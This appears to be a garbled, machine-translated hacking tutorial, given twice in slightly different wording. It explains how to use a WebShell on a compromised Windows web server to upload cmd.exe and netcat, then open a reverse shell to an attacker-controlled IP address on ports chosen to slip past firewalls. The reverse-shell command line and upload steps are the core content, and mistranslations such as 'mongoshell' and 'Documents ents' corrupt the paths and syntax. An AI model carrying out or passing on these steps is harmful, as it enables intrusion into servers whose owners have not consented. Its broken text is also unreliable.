Prerequisites: 1. You can use WebShell to run the cmd command. There are many examples. The first example is wscript.shell. if the modified name is deleted, you can find the runtime directory and upload cmd.exe. 2. Upload nc. You can upload files to the same directory as cmd.exe. Step: Listen to a local port. Nc-vv-l-p8080 is preferably port 80 or 8080, Which is fireproof
Prerequisites:
1. Run cmd with WebShellCommand.
There are many methods. First, WScript. Shell. If it is renamed or deleted, find the executable directory to upload cmd.ExE.
2. UploadNc. You can upload files to the same directory as cmd.exe.
Steps:
Now, a local port is monitored.
Nc-vv-l-p 8080
It is best to use ports 80 or 8080, which are much less likely to be intercepted by the firewall. My machine 80 is occupied by Apache, and 8080 is used.
Run the following command in WebShell to connect to the port we listen to and get mongoshell:
Nc-vv 222.71.138.177 8080-e C: \ Documents ents and Settings \ All Users \ Documents ents \ cmd.exe
(Hypothetical cmd.exe is uploaded to the "C: \ Documents ents and Settings \ All Users \ Documents \" Directory)
Wait a moment and you will be able to get the mongoshell.
As I mentioned earlier, it is a low-Permission mongoshell, which can do very little. However, it is much easier to run many cmd commands.
To run the upload program in the reverse shell, use the following format:
C: \ WINDOWS \ system32 \ inetsrv> "C: \ Documents and Settings \ All Users \ Documents ents \ cmd.exe"